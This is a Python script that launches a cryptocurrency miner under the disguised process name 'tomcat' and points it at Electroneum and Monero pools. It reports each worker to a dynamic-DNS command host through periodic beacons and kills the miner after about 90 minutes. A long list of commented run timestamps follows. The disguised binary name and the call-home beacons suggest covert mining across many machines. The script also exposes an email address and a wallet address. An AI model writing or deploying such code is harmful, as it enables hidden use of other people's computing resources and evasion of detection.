import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:25:07.902485
#2018-02-17 17:13:06.420401
#2018-02-17 19:01:01.443583
#2018-02-17 20:48:05.720393
#2018-02-17 22:35:03.358760
#2018-02-18 00:19:04.013964
#2018-02-18 02:10:06.250293
#2018-02-18 03:57:02.100342
#2018-02-18 05:44:05.045947
#2018-02-18 07:37:01.983381
#2018-02-18 09:24:05.257508
#2018-02-18 11:10:04.447259
#2018-02-18 12:57:03.932384
#2018-02-18 14:44:04.685104
#2018-02-18 16:32:04.835123
#2018-02-18 18:21:03.925952
#2018-02-18 20:06:06.291813
#2018-02-18 21:53:03.804189
#2018-02-18 23:42:07.112757
#2018-02-19 01:28:04.797243
#2018-02-19 03:16:05.804791
#2018-02-19 05:01:04.419067
#2018-02-19 06:45:01.969896
#2018-02-19 08:35:08.883320
#2018-02-19 10:24:07.863494
#2018-02-19 12:12:06.770364
#2018-02-19 14:01:02.130358
#2018-02-19 15:50:03.093474
#2018-02-19 17:39:07.478101
#2018-02-19 19:28:06.039951
#2018-02-19 21:17:07.721030
#2018-02-19 23:04:08.053680
#2018-02-20 00:49:07.381099
#2018-02-20 02:40:06.847133
#2018-02-20 04:29:03.554893
#2018-02-20 06:12:06.673610
#2018-02-20 07:57:07.215859
#2018-02-20 09:42:07.290527
#2018-02-20 11:26:09.094446
#2018-02-20 13:13:02.005790
#2018-02-20 14:58:02.053073
#2018-02-20 16:43:04.895783
#2018-02-20 18:31:08.891125
#2018-02-20 20:21:03.874036
#2018-02-20 22:07:04.064143
#2018-02-21 00:56:06.612142
#2018-02-21 02:43:04.628287
#2018-02-21 04:33:07.525431
#2018-02-21 06:21:07.379749
#2018-02-21 08:06:06.152858
#2018-02-21 09:52:01.276595
#2018-02-21 11:41:11.296641
#2018-02-21 13:32:09.424316
#2018-02-21 15:17:05.143586
#2018-02-21 17:09:01.468573
#2018-02-21 18:57:01.935540
#2018-02-21 20:44:05.241236
#2018-02-21 22:30:09.909736
#2018-02-22 00:19:08.661838
#2018-02-22 02:06:01.552867
#2018-02-22 03:51:06.967832
#2018-02-22 05:39:05.341287
#2018-02-22 07:24:06.197468
#2018-02-22 09:12:06.869080
#2018-02-22 10:59:06.412756
#2018-02-22 12:46:06.175362
#2018-02-22 14:33:06.110679
#2018-02-22 16:19:05.716563
#2018-02-22 18:05:10.930119
#2018-02-22 19:55:05.623724
#2018-02-22 21:46:10.334050
#2018-02-22 23:32:06.997194
#2018-02-23 01:21:07.393484
#2018-02-23 03:08:06.378256
#2018-02-23 04:54:01.423791
#2018-02-23 06:38:07.078861
#2018-02-23 08:28:08.463893
#2018-02-23 10:42:07.246114
#2018-02-23 12:39:07.731481
#2018-02-23 14:24:06.706135
#2018-02-23 16:15:03.387460
#2018-02-23 18:02:06.947783
#2018-02-23 19:46:12.210458
#2018-02-23 21:28:05.166172
#2018-02-23 23:17:03.747632
#2018-02-24 01:12:07.967940
#2018-02-24 03:05:05.900629
#2018-02-24 04:51:07.523503
#2018-02-24 06:36:01.455138
#2018-02-24 08:24:06.169187
#2018-02-24 10:10:06.198618
#2018-02-24 12:05:07.775632
#2018-02-24 13:53:03.670834
#2018-02-24 15:31:07.801803
#2018-02-24 17:27:03.384600
#2018-02-24 19:14:02.144205
#2018-02-24 21:01:05.436990
#2018-02-24 23:33:03.603821
#2018-02-25 03:44:07.583711
#2018-02-25 07:29:05.762228